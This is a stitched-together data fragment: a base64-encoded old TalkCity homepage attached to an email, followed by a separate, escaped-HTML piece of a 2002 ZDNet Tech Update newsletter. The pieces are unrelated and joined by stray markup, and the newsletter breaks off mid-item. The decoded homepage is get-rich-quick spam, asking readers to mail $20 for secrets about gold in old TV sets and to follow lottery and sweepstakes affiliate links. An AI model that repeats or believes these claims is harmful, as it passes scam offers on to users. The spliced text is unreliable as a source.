 bS9pbWFnZXMvc3BhY2VyLmdpZiIgV0lEVEg9NjAwIEhFSUdIVD0yIEFMSUdO
 PWJvdHRvbT48L1REPjwvVFI+DQo8L1RBQkxFPg0KDQoNCjwhLS0gPElNRyBT
 UkM9InBob3RvMS5naWYiIFZTUEFDRT02PjxCUj4gLS0+DQo8SU1HIHNyYz0i
 aHR0cDovL2hvbWUudGFsa2NpdHkuY29tL2ltYWdlcy9zcGFjZXIuZ2lmIiBW
 U1BBQ0U9Mz48YnI+DQo8IS0tIHRvcCBwaG90byAtLT4NCjwhLS0NCnRlbXBs
 YXRlcy9ob21ldG9vbC9jb21wb25lbnRzL0Zvcm1hdEltYWdlLnR4dA0KLS0+
 DQo8YSBocmVmPSJzdGF0Lmh0bWwiPjxpbWcgc3JjPSI1NjBfMjM4NC5naWYi
 ICAgID48L2E+DQoNCjwhLS0NCkNMT1NFIHRlbXBsYXRlcy9ob21ldG9vbC9j
 b21wb25lbnRzL0Zvcm1hdEltYWdlLnR4dA0KLS0+DQo8YnI+DQo8SU1HIHNy
 Yz0iaHR0cDovL2hvbWUudGFsa2NpdHkuY29tL2ltYWdlcy9zcGFjZXIuZ2lm
 IiBWU1BBQ0U9Mz48YnI+DQoNCjxUQUJMRSBCT1JERVI9MCBDRUxMU1BBQ0lO
 Rz0xIENFTExQQURESU5HPTAgV0lEVEg9NjAwPg0KPCEtLSBjYXB0aW9uIGZv
 ciB0b3AgcGhvdG8gLS0+DQo8VFI+PFREIENPTFNQQU49NSBBTElHTj1DRU5U
 RVI+PCEtLQ0KdGVtcGxhdGVzL2hvbWV0b29sL2NvbXBvbmVudHMvRm9ybWF0
 VGV4dC50eHQNCi0tPg0KDQo8Zm9udCBmYWNlPSJBcmlhbCxIZWx2ZXRpY2Ei
 IHNpemU9IjMiPjxiPndlbGNvbWUgdG8gYmlsbCByZWRtb25kIGVudGVycHJp
 c2VzPC9iPjwvZm9udD48YnI+DQoNCg0KPGZvbnQgY29sb3I9IiNGRjAwMzMi
 Pjxmb250IGZhY2U9IkFyaWFsLEhlbHZldGljYSIgc2l6ZT0iMyI+PGk+PGI+
 DQ0KIGJlbG93IHdob2xlc2FsZSBwcmljZXMgb24sc3BvcnRpbmdzIGdvb2Rz
 LCBhdXRvIGVsZWN0cm9uaWNzLGZyZWUgbW9udGhseSBjYXNoLTMgdGlwc2hl
 ZXRzIGdlbmVyYXRlZCBmb3INDQp5b3VyIHN0YXRlPC9iPjwvaT48L2ZvbnQ+
 PC9mb250Pg0KDQo8IS0tDQpDTE9TRSB0ZW1wbGF0ZXMvaG9tZXRvb2wvY29t
 cG9uZW50cy9Gb3JtYXRUZXh0LnR4dA0KLS0+DQoNCjxCUj4mbmJzcDs8L1RE
 PjwvVFI+DQo8VFI+PFREIGJnY29sb3I9IzAwMDA2NiBIRUlHSFQ9IjIiIENP
 TFNQQU49NT48SU1HIFNSQz0iaHR0cDovL2hvbWUudGFsa2NpdHkuY29tL2lt
 YWdlcy9zcGFjZXIuZ2lmIiBXSURUSD02MDAgSEVJR0hUPTIgQUxJR049Ym90
 dG9tPjwvVEQ+PC9UUj4NCjxUUj48VEQgSEVJR0hUPSIyIiBDT0xTUEFOPTU+
 PElNRyBTUkM9Imh0dHA6Ly9ob21lLnRhbGtjaXR5LmNvbS9pbWFnZXMvc3Bh
 Y2VyLmdpZiIgV0lEVEg9NjAwIEhFSUdIVD0yPjwvVEQ+PC9UUj4NCjxUUj48
 VEQgVkFMSUdOPXRvcCBXSURUSD0xMTI+DQo8Q0VOVEVSPg0KPCEtLSBzaWRl
 IHBob3RvIC0tPg0KPCEtLQ0KdGVtcGxhdGVzL2hvbWV0b29sL2NvbXBvbmVu
 dHMvRm9ybWF0SW1hZ2UudHh0DQotLT4NCjxhIGhyZWY9IkhUVFA6Ly9XV1cu
 Y2FsbHdhdmUuY29tL2ZpbmRvdXRtb3JlLmh0bWwiPjxpbWcgc3JjPSJuZXdn
 ZXRpdG5vd2J1dHRvbjIuZ2lmIiAgICA+PC9hPg0KDQo8IS0tDQpDTE9TRSB0
 ZW1wbGF0ZXMvaG9tZXRvb2wvY29tcG9uZW50cy9Gb3JtYXRJbWFnZS50eHQN
 Ci0tPg0KDQo8L0NFTlRFUj48QlI+DQo8IS0tDQp0ZW1wbGF0ZXMvaG9tZXRv
 b2wvY29tcG9uZW50cy9Gb3JtYXRUZXh0LnR4dA0KLS0+DQoNCg0KPGZvbnQg
 Y29sb3I9IiNGRjAwMzMiPjxmb250IGZhY2U9IkFyaWFsLEhlbHZldGljYSIg
 c2l6ZT0iMiI+Tk8gTkVFRCBUTyBCVVkgQSAyTkQgVEVMRVBIT05FIExJTkUt
 LUdFVCBBTEwgWU9VUiBQSE9ORQ08YnI+DQpDQUxMUyBXSElMRSBPTiBZT1VS
 IENPTVBVVEVSLS1USEVZIEdPIFNUUkFJR0hUIElOVE8gWU9VUiBFLU1BSUwt
 LS1JVFMgIkZSRUUiLS0tQ0xJQ0sgSEVSRQ08YnI+DQo8L2ZvbnQ+PC9mb250
 Pg0KDQo8IS0tDQpDTE9TRSB0ZW1wbGF0ZXMvaG9tZXRvb2wvY29tcG9uZW50
 cy9Gb3JtYXRUZXh0LnR4dA0KLS0+DQoNCjxJTUcgU1JDPSJodHRwOi8vaG9t
 ZS50YWxrY2l0eS5jb20vaW1hZ2VzL3NwYWNlci5naWYiIFdJRFRIPTExMiBI
 RUlHSFQ9MSBBTElHTj1ib3R0b20+PEJSPg0KDQo8L1REPjxURCBWQUxJR049
 dG9wPg0KPFA+Jm5ic3A7Jm5ic3A7DQo8L1REPjxURCBWQUxJR049dG9wIGJn
 Y29sb3I9IiMwMDAwNjYiIFdJRFRIPTI+DQo8UD48SU1HIFNSQz0iaHR0cDov
 L2hvbWUudGFsa2NpdHkuY29tL2ltYWdlcy9zcGFjZXIuZ2lmIiBXSURUSD0y
 IEhFSUdIVD0xMCBBTElHTj1ib3R0b20+DQo8L1REPjxURCBWQUxJR049dG9w
 Pg0KPFA+Jm5ic3A7Jm5ic3A7DQo8L1REPjxURCBWQUxJR049dG9wIFdJRFRI
 PTQ2MD4NCjxQPjxDRU5URVI+PFRBQkxFIEJPUkRFUj0wIENFTExTUEFDSU5H
 PTAgQ0VMTFBBRERJTkc9MCBXSURUSD0iNDYwIj4NCjxUUj4NCjxURCBWQUxJ
 R049dG9wPg0KPElNRyBzcmM9Imh0dHA6Ly9ob21lLnRhbGtjaXR5LmNvbS9p
 bWFnZXMvc3R5bGUvU2FpbGJvYXQvYWJvdXRfbWUuZ2lmIiBhbHQ9IkFib3V0
 IE1lIiB3aWR0aD0yMjAgaGVpZ2h0PTQwIEFMSUdOPWJvdHRvbT48L1REPg0K
 PFREIFZBTElHTj10b3AgQUxJR049UklHSFQ+PFAgQUxJR049UklHSFQ+PEI+
 DQo8IS0tIGVtYWlsIC0tPg0KPGEgaHJlZj0ibWFpbHRvOmJpbGxyZWRtb0Bh
 ZnJpY2FuYS5jb20iPmJpbGxyZWRtb0BhZnJpY2FuYS5jb208L2E+DQo8L1RE
 Pg0KDQo8VEQgVkFMSUdOPXRvcCBXSURUSD01MSBST1dTUEFOPTI+DQoNCg0K
 PFAgQUxJR049UklHSFQ+PEEgSFJFRj0ibWFpbHRvOmJpbGxyZWRtb0BhZnJp
 Y2FuYS5jb20iPjxJTUcgU1JDPSJodHRwOi8vaG9tZS50YWxrY2l0eS5jb20v
 aW1hZ2VzL2VtYWlsbWUuZ2lmIiBBTFQ9IkVtYWlsIE1lIiBXSURUSD01MSBI
 RUlHSFQ9NTkgQk9SREVSPTAgQUxJR049dG9wPjwvQT4NCg0KDQo8QlI+PC9U
 RD48L1RSPg0KPFRSPg0KPFREIFZBTElHTj10b3AgV0lEVEg9NDA5IENPTFNQ
 QU49Mj4NCjwhLS0gR2VuZXJhbCB0ZXh0IG9mIHBhZ2UgLS0+DQo8UD48IS0t
 DQp0ZW1wbGF0ZXMvaG9tZXRvb2wvY29tcG9uZW50cy9Gb3JtYXRUZXh0LnR4
 dA0KLS0+DQoNCjxmb250IGZhY2U9IkFyaWFsLEhlbHZldGljYSIgc2l6ZT0i
 MyI+PGI+dmlzaXQgYm90aCBvZiBiaWxsIHJlZG1vbmRzIGJlbG93IHdob2xl
 c2FsZSBzdG9yZXM8L2I+PC9mb250Pjxicj4NCg0KDQo8Zm9udCBjb2xvcj0i
 I0ZGMDAzMyI+PGZvbnQgZmFjZT0iVGltZXMiIHNpemU9IjMiPiIgbXkgb3Ro
 ZXIgd2Vic2l0ZXMiDQ0KaHR0cDovL3d3dy5tcnJlZG1vbmQuY29tDQ0KaHR0
 cDovL3d3dy53aWxsaWFtIHJlZG1vbmQuY29tPC9mb250PjwvZm9udD4NCg0K
 PCEtLQ0KQ0xPU0UgdGVtcGxhdGVzL2hvbWV0b29sL2NvbXBvbmVudHMvRm9y
 bWF0VGV4dC50eHQNCi0tPg0KDQo8QlI+Jm5ic3A7PC9URD48L1RSPg0KPC9U
 QUJMRT4NCjxUQUJMRSBCT1JERVI9MCBDRUxMU1BBQ0lORz0wIENFTExQQURE
 SU5HPTAgV0lEVEg9IjQ2MCI+DQo8VFI+DQo8VEQgVkFMSUdOPXRvcCBDT0xT
 UEFOPTMgV0lEVEg9IjQ2MCI+DQo8IS0tIHdoYXQgSSBsb29rIGZvciAtLT4N
 CjwhLS0NCnRlbXBsYXRlcy9ob21ldG9vbC9jb21wb25lbnRzL0Zvcm1hdFRl
 eHQudHh0DQotLT4NCg0KPGZvbnQgZmFjZT0iQXJpYWwsSGVsdmV0aWNhIiBz
 aXplPSIzIj48Yj5XSEFUIEkgTE9PSyBGT1IgSU4gT1RIRVIgUEVPUExFPC9i
 PjwvZm9udD48YnI+DQoNCg0KPGZvbnQgY29sb3I9IiNGRjAwMzMiPjxmb250
 IGZhY2U9IlRpbWVzIiBzaXplPSIzIj4gICAgICAgICAgICAgIkdPVCBHT0xE
 IElOIFlPVVIgQVRUSUMiDTxicj4NCkZPUiBFWEFNUExFLE9MRCBUViBTRVRT
 IENPTlRBSU4gQVQgTEVBU1QgT04gT1VOQ0UhDTxicj4NCkNPTExFQ1QgQU5E
 IFJFRklORSBZT1VSU0VMRiBBVCBIT01FLiBSVVNIICQyMC4wMCBUTy0NPGJy
 Pg0KICAgICAgICAgICAgIFdJTExJQU0gTCBSRURNT05EDTxicj4NCiAgICAg
 ICAgICAgICA4MDEgU08uIEggU1QuIEFQVC4yDTxicj4NCiAgICAgICAgICAg
 ICBMQUtFV09SVEgsRkxBLjMzNDYwPC9mb250PjwvZm9udD4NCg0KPCEtLQ0K
 Q0xPU0UgdGVtcGxhdGVzL2hvbWV0b29sL2NvbXBvbmVudHMvRm9ybWF0VGV4
 dC50eHQNCi0tPg0KDQo8QlI+DQombmJzcDsNCjwvVEQ+PC9UUj4NCjxUUj4N
 CjxURCBWQUxJR049dG9wIFdJRFRIPSIyMjUiPg0KPElNRyBTUkM9Imh0dHA6
 Ly9ob21lLnRhbGtjaXR5LmNvbS9pbWFnZXMvc3BhY2VyLmdpZiIgV0lEVEg9
 MjI1IEhFSUdIVD0xIEFMSUdOPWJvdHRvbT48QlI+DQo8IS0tIGxpa2VzIC0t
 Pg0KPCEtLQ0KdGVtcGxhdGVzL2hvbWV0b29sL2NvbXBvbmVudHMvRm9ybWF0
 VGV4dC50eHQNCi0tPg0KDQo8Zm9udCBmYWNlPSJBcmlhbCxIZWx2ZXRpY2Ei
 IHNpemU9IjMiPjxiPlRISU5HUyBJIExJS0U8L2I+PC9mb250Pjxicj4NCg0K
 DQo8Zm9udCBjb2xvcj0iI0ZGMDAzMyI+PGZvbnQgZmFjZT0iVGltZXMiIHNp
 emU9IjMiPiAgICAgICAgICAgICAgIlRIUk9XSU5HIEFXQVkiDQ0KICAgICAg
 ICAgICAgICAgJDUgRE9MTEFSUyBQRVIgUE9VTkQNDQpldmVyeW9uZSBoYXMg
 dGhyb3duIGF3YXkgYSBsaXR0bGUga25vd24gYXNzZXQub25seSBvbmUgb3V0
 IG9mIDEsMDAwIHNhdmUgaXQuIGxlYXJuIGhvdyB0byBjb2xsZWN0IHRoaXMg
 bWF0ZXJpYWwgZnJvbSB0aG9zZSB3aG8gZG9uInQga25vdyBpdHMgdmFsdWUs
 YW5kIHdoZXJlIHRvIHNhbGUgZm9yICQ1cGVyIGxiLi0tLXNlbmQgJDIwLjAw
 IHRvLS13aWxsaWFtIHJlZG1vbmQNDQogICAgICAgICAgICAgICAgICAgODAx
 IHNvLiBoIHN0LiBhcHQuMg0NCiAgICAgICAgICAgICAgICAgICBsYWtld29y
 dGgsZmxhLjMzNDYwDQ0KDQ0KDQ0KIA0NCiAgICAgICAgICAgPC9mb250Pjwv
 Zm9udD4NCg0KPCEtLQ0KQ0xPU0UgdGVtcGxhdGVzL2hvbWV0b29sL2NvbXBv
 bmVudHMvRm9ybWF0VGV4dC50eHQNCi0tPg0KDQo8QlI+DQoNCiZuYnNwOw0K
 DQo8L1REPjxURCBXSURUSD0iMTAiPg0KPFA+Jm5ic3A7Jm5ic3A7Jm5ic3A7
 DQo8L1REPjxURCBWQUxJR049dG9wIFdJRFRIPSIyMjUiPg0KPElNRyBTUkM9
 Imh0dHA6Ly9ob21lLnRhbGtjaXR5LmNvbS9pbWFnZXMvc3BhY2VyLmdpZiIg
 V0lEVEg9MjI1IEhFSUdIVD0xIEFMSUdOPWJvdHRvbT48QlI+DQo8IS0tIGRp
 c2xpa2VzIC0tPg0KPCEtLQ0KdGVtcGxhdGVzL2hvbWV0b29sL2NvbXBvbmVu
 dHMvRm9ybWF0VGV4dC50eHQNCi0tPg0KDQo8Zm9udCBmYWNlPSJBcmlhbCxI
 ZWx2ZXRpY2EiIHNpemU9IjMiPjxiPlRISU5HUyBJIERPTidUIExJS0U8L2I+
 PC9mb250Pjxicj4NCg0KDQo8Zm9udCBmYWNlPSJUaW1lcyIgc2l6ZT0iMyI+
 ImluY29tZSB0YXhlcy0tLS1kZWJ0cy0tLS1zcGFtIGUtbWFpbCI8L2ZvbnQ+
 DQoNCjwhLS0NCkNMT1NFIHRlbXBsYXRlcy9ob21ldG9vbC9jb21wb25lbnRz
 L0Zvcm1hdFRleHQudHh0DQotLT4NCg0KPEJSPg0KDQoNCiZuYnNwOw0KPC9U
 RD48L1RSPg0KPFRSPg0KPFREIFdJRFRIPSIyMjUiIFZBTElHTj10b3A+DQo8
 UD4NCjxJTUcgU1JDPSJodHRwOi8vaG9tZS50YWxrY2l0eS5jb20vaW1hZ2Vz
 L3N0eWxlL1NhaWxib2F0L2Zhdl91cmwuZ2lmIiBBTFQ9IkZhdm9yaXRlIFVS
 THMiIFdJRFRIPTIyMCBIRUlHSFQ9NDAgQUxJR049Ym90dG9tPg0KPEJSPjxG
 T05UIFNJWkU9Ii0xIiBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPk15IGZyaWVu
 ZHMnIGhvbWUgcGFnZXMsIGZhdm9yaXRlIFVSTHMsIG90aGVyIHBhZ2VzIG9u
 IG15IHdlYiBzaXRlLjwvRk9OVD48QlI+Jm5ic3A7PC9URD4NCg0KPFREPg0K
 PC9URD4NCg0KPFREIFdJRFRIPSIyMjUiIFZBTElHTj10b3A+DQo8UD4NCjxJ
 TUcgU1JDPSJodHRwOi8vaG9tZS50YWxrY2l0eS5jb20vaW1hZ2VzL3N0eWxl
 L1NhaWxib2F0L2Zhdl9jaGF0LmdpZiIgQUxUPSJGYXZvcml0ZSBDaGF0cyIg
 V0lEVEg9MjIwIEhFSUdIVD00MCBBTElHTj1ib3R0b20+DQo8QlI+PEZPTlQg
 U0laRT0iLTEiIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+VGFsayBDaXR5IGNo
 YXQgcm9vbXMgd2hlcmUgeW91J2xsIGZpbmQgbWUuPC9GT05UPjxCUj4mbmJz
 cDs8L1REPjwvVFI+DQoNCjxUUj4NCjxURCBWQUxJR049dG9wPg0KDQo8IS0t
 IHVybCBsaXN0IC0tPg0KDQo8Qj48QSBIUkVGPSJodHRwOi8vc3RvcmUueWFo
 b28uY29tL2NnaS1iaW4vY2xpbms/Y2xhc3NpZmllZHMrd2c1ZHdlK2luZGV4
 Lmh0bWwiPnBsYWNlIHlvdXIgYWQgaW4gb3ZlciA4LDAwMCBuZXdzcGFwZXJz
 ISBjbGljayBoZXJlITwvQT48L0I+IC0gIDwvRk9OVD48UD4NCjxCPjxBIEhS
 RUY9Imh0dHA6Ly93d3cuaXdpbi5jb20vbG9naW4vcmVnaXN0ZXIuYXNwP2li
 dWRkeT03MjM2QGJlbGxzb3V0aC5uZXQ8YnI+Ij5wbGF5LSQxIG1pbGxpb24g
 ZG9sbGFyIGxvdHRlcnk8L0E+PC9CPiAtICA8L0ZPTlQ+PFA+DQo8Qj48QSBI
 UkVGPSJodHRwOi8vaG9tZS50YWxrY2l0eS5jb20vU3BhcmtwbHVnU3QvYmls
 cmVkL3N0YXQuaHRtbCI+bWFrZSBtb25leSBmcm9tIHlvdXIgd2Vic2l0ZSEg
 am9pbiBsaW5rc2hhcmUsPC9BPjwvQj4gLSAgPC9GT05UPjxQPg0KPEI+PEEg
 SFJFRj0iaHR0cDovL3d3dy5zZW5pb3JleHBsb3Jlci5jb20iPmFsbCBzZW5p
 b3IgY2l0aXplbnMgICBnZXQgeW91ciBmcmVlLWNvbXB1dGVyPC9BPjwvQj4g
 LSAgPC9GT05UPjxQPg0KPEI+PEEgSFJFRj0iaHR0cDovL3d3dy5zd2VlcHNj
 bHViLmNvbS9pbmRleC5odG1sP3NjcmF0Y2hwcm9tbz15ZXMmYWZmaWxpYXRl
 c2Vxbm89MTAxMCI+am9pbiBzd2VlcHNjbHViLW1ha2UgJDEsMDAwIGV2ZXJ5
 ZGF5ITwvQT48L0I+IC0gIDwvRk9OVD48UD4NCjxCPjxBIEhSRUY9Imh0dHA6
 Ly93d3cubG93ZXJteWJpbGxzLmNvbSI+TE9XRVIgQUxMIFlPVVIgQklMTFMt
 Z2FzLXdhdGVyLWVsZWN0cmljLWhvdXNlIHBheW1lbnRzPC9BPjwvQj4gLSAg
 PC9GT05UPjxQPg0KPEI+PEEgSFJFRj0iaHR0cDovL2hvbWUudGFsa2NpdHku
 Y29tL1NwYXJrcGx1Z1N0L2JpbHJlZC8wMi5odG1sIj5zZWUgcGFnZTItLWJp
 bGwgcmVkbW9uZCBlbnRlcnByaXNlczwvQT48L0I+IC0gIDwvRk9OVD48UD4N
 CjxCPjxBIEhSRUY9Imh0dHA6Ly93d3cubXJyZWRtb25kLmNvbSI+IkJJTEwg
 UkVETU9ORCJTIFNJVEUgT0YgVEhFIE1PTlRILUNMSUNLPC9BPjwvQj4gLSAg
 PC9GT05UPjxQPg0KDQo8L1REPjxURD4NCjwvVEQ+PFREIFZBTElHTj10b3A+
 DQoNCjwhLS0gY2hhdCBsaXN0IC0tPg0KDQo8Qj48QSBIUkVGPSJodHRwOi8v
 d3d3LnRhbGtjaXR5LmNvbS9jaGF0L2NoYXRsYXVuY2hlci5odG1wbD9yb29t
 PVRvd25UYWxrIj5Ub3duVGFsazwvQT48L0I+IC0gR3JlYXQgcGxhY2UgdG8g
 bWVldCBwZW9wbGUuPC9GT05UPjxQPg0KDQo8L1REPjwvVFI+DQo8L1RBQkxF
 Pg0KDQo8L0NFTlRFUj4NCg0KPC9URD48L1RSPg0KPFRSPjxURCBIRUlHSFQ9
 IjIiIENPTFNQQU49NT48SU1HIFNSQz0iaHR0cDovL2hvbWUudGFsa2NpdHku
 Y29tL2ltYWdlcy9zcGFjZXIuZ2lmIiBXSURUSD02MDAgSEVJR0hUPTI+PC9U
 RD48L1RSPg0KPFRSPjxURCBiZ2NvbG9yPSMwMDAwNjYgSEVJR0hUPSIyIiBD
 T0xTUEFOPTU+PElNRyBTUkM9Imh0dHA6Ly9ob21lLnRhbGtjaXR5LmNvbS9p
 bWFnZXMvc3BhY2VyLmdpZiIgV0lEVEg9NjAwIEhFSUdIVD0yIEFMSUdOPWJv
 dHRvbT48L1REPjwvVFI+DQo8L1RBQkxFPg0KDQo8UD48IS0tIEd1ZXN0Ym9v
 ayAtLT4NCjwhLS0NCnRlbXBsYXRlcy9ob21ldG9vbC9jb21wb25lbnRzL0d1
 ZXN0Ym9va0ljb25zLnR4dA0KLS0+DQoNCjxhIGhyZWY9Imh0dHA6Ly9qLnRh
 bGtjaXR5LmNvbS9odC9HdWVzdGJvb2tFbnRyeT9wYWdlX2lkPTQyODE3MDQm
 Y29tcF9pZD03NjI5ODMiPjxJTUcgU1JDPSJodHRwOi8vaG9tZS50YWxrY2l0
 eS5jb20vaW1hZ2VzL3N0eWxlL1NhaWxib2F0L3NpZ25fZ3Vlc3Rib29rLmdp
 ZiIgQk9SREVSPTA+PC9hPg0KJm5ic3A7Jm5ic3A7Jm5ic3A7DQo8YSBocmVm
 PSJodHRwOi8vai50YWxrY2l0eS5jb20vaHQvR3Vlc3Rib29rRGlzcGxheT9w
 YWdlX2lkPTQyODE3MDQmY29tcF9pZD03NjI5ODMiPjxJTUcgU1JDPSJodHRw
 Oi8vaG9tZS50YWxrY2l0eS5jb20vaW1hZ2VzL3N0eWxlL1NhaWxib2F0L3Jl
 YWRfZ3Vlc3Rib29rLmdpZiIgQk9SREVSPTA+PC9hPg0KDQoNCjwhLS0NCkNM
 T1NFIHRlbXBsYXRlcy9ob21ldG9vbC9jb21wb25lbnRzL0d1ZXN0Ym9va0lj
 b25zLnR4dA0KLS0+DQoNCjwvQ0VOVEVSPg0KPFA+PENFTlRFUj4NCg0KPEI+
 WW91IGFyZSB2aXNpdG9yIG51bWJlcjwvQj48QlI+DQoNCjxpbWcgc3JjPSJo
 dHRwOi8vaW1hZ2VzLnRhbGtjaXR5LmNvbS9pbWcvaG9tZXBhZ2VzL2NvdW50
 ZXIvbHZpY3Rvcmlhbi5naWYiIGFsdD0iZW5kIGNhcCIgaGVpZ2h0PSIzNyIg
 d2lkdGg9IjI0Ij48aW1nIHNyYz0iaHR0cDovL2ltYWdlcy50YWxrY2l0eS5j
 b20vaW1nL2hvbWVwYWdlcy9jb3VudGVyLzR2aWN0b3JpYW4uZ2lmIiBoZWln
 aHQ9IjM3IiB3aWR0aD0iMjQiPjxpbWcgc3JjPSJodHRwOi8vaW1hZ2VzLnRh
 bGtjaXR5LmNvbS9pbWcvaG9tZXBhZ2VzL2NvdW50ZXIvM3ZpY3Rvcmlhbi5n
 aWYiIGhlaWdodD0iMzciIHdpZHRoPSIyNCI+PGltZyBzcmM9Imh0dHA6Ly9p
 bWFnZXMudGFsa2NpdHkuY29tL2ltZy9ob21lcGFnZXMvY291bnRlci9ydmlj
 dG9yaWFuLmdpZiIgYWx0PSJlbmQgY2FwIiBoZWlnaHQ9IjM3IiB3aWR0aD0i
 MjQiPg0KPC9DRU5URVI+DQoNCjwvQk9EWT4NCjwvSFRNTD4NCg0KPCEtLQ0K
 Q0xPU0UgdGVtcGxhdGVzL2hvbWV0b29sL3BhZ2VzL1RDQ2xhc3NpY0Jpby50
 eHQNCi0tPg0K
 --= Multipart Boundary 0802010258--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</si>
  <si>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href="http://clickthru.online.com/Click?q=da-dT8jQUPq_yG4td5bjsMVKpv3DxnR" &gt;&lt;img src="http://www.zdnet.com/techupdate/i/itnewsletter_today.gif" width="440" height="60" border="0"  alt="Tech Update Today"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=160 align=center valign=top rowspan=2 bgcolor="#ffffff"&gt;
         &lt;img src="http://www.zdnet.com/techupdate/i/gl_ad2.gif" width="160" height="16" border="0"  alt="Advertisement"&gt;&lt;br&gt;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href="http://clickthru.online.com/Click?q=ef-04uYQmkHvc_A2HIqBxDVAmoBameR"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12, 2002&lt;/font&gt;&lt;br&gt;&lt;/div&gt;
 &lt;!--DATE--&gt;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&lt;!--LEDE ART--&gt;
            &lt;font face="arial, helvetica" size="-1"&gt;
        &lt;b&gt;David Berlind&lt;/b&gt;&lt;br&gt;
 &lt;font size="+1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=04-k9W0IFQXF_6EZsS98BbBL7kOi_yR" &gt;
 &lt;b&gt;What you need for iPaq wireless connectivity&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 A public health organization has several iPaqs on order, but
 now they want to add WAN connectivity to those PDAs. What
 exactly do they need to do? I'm so glad they asked. 
 &lt;br&gt;
      &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;&lt;font size="-1"&gt;
 	 &lt;a href="http://clickthru.online.com/Click?q=1a-y6ZkIlXH6MJSb-Kd5q0_HZB17WnR" &gt;
 	 &lt;b&gt;Here's everything you need to know&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;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href="http://clickthru.online.com/Click?q=2f-hYaFIqnzA6E38WoP26D_8gaZjMeR" &gt;Security holds back Web services&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=44-9nxfIZUtYwDmuvkEMLKlXBDgnVsR" &gt;China: Bursting with brainpower&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=59-y53oIEnthwrVs3glpW-B_KMqztFR" &gt;Micron cranks handle on next-gen memory&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=6e-2aYjIyES2GRneK4QA5K-fxuEL59R" &gt;Japan chipmakers team on 'SoCs' chip&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=83-U-BXQYJ7lckijvVtuoAABMMPZ9rR" &gt;HP tech exec jumps ship to EMC&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=98-FTaOQ_zabL_d79lCW5CH7esbKRiR" &gt;Holes put Linux handheld at risk&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ad-_4IAQzEB4qyJ-H4QhaIHsSzky0PR" &gt;Microsoft bids to be creme de la CRM&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=c3-x1yCQJLx-_60EEMZ5znP-FdWuurR"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src="http://techupdate.zdnet.com/techupdate/i/dfarber.jpg"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size="+1"&gt;&lt;b&gt;Desperately seeking chief ethics officer&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 &lt;b&gt;Greedy CEOs&lt;/b&gt; are making a bad name for the profession--and corporate America. The title chief executive officer now
 conjures up an image of someone with questionable ethics, a
 greedy disposition, and a disregard for shareholders. If
 government-proposed remedies can"t adequately address this
 &lt;b&gt;ethics crisis&lt;/b&gt;, disgruntled shareholders surely will.
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=d8-XW73QWLWI7IwzgRmkSWreAgRDciR" &gt;
 &lt;b&gt;Read my full commentary&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
   &lt;!-- STORY 2 --&gt;
  &lt;table cellpadding="0" cellspacing="0" border="0" width="220" align="right"&gt;
 &lt;tr valign=top&gt;
                 &lt;td&gt;
 &lt;img src="http://www.zdnet.com/enterprise/graphics/071102_ellison_quote.jpg" width="220" height="193" border="0"&gt;
 &lt;BR&gt;
                 &lt;/td&gt;
                 &lt;td width=10&gt;
 &lt;img src="http://www.zdnet.com/b.gif" width=10 height=1&gt;&lt;/td&gt;
                 &lt;/tr&gt;
 &lt;/table&gt;
   &lt;font size="+1"&gt;
   &lt;b&gt;Oracle challenges Microsoft anew&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Oracle is taking on Microsoft's Exchange with a &lt;b&gt;Collaboration Suite&lt;/b&gt; that includes e-mail, calendar and messaging software. Oracle has pitched its products as Microsoft replacements before -- with spectacularly little success. (At Comdex last November, the database giant offered its 9i and app-server software as a more secure &lt;b&gt;alternative to Exchange&lt;/b&gt;.) What's different this time? Oracle is selling a separate collaboration product that, says CEO &lt;b&gt;Larry Ellison&lt;/b&gt;, is cheaper than rival offerings. Plus: Companies facing a deadline to join Redmond's new &lt;b&gt;licensing program&lt;/b&gt; may be more open to non-Micrososft alternatives.
 &lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
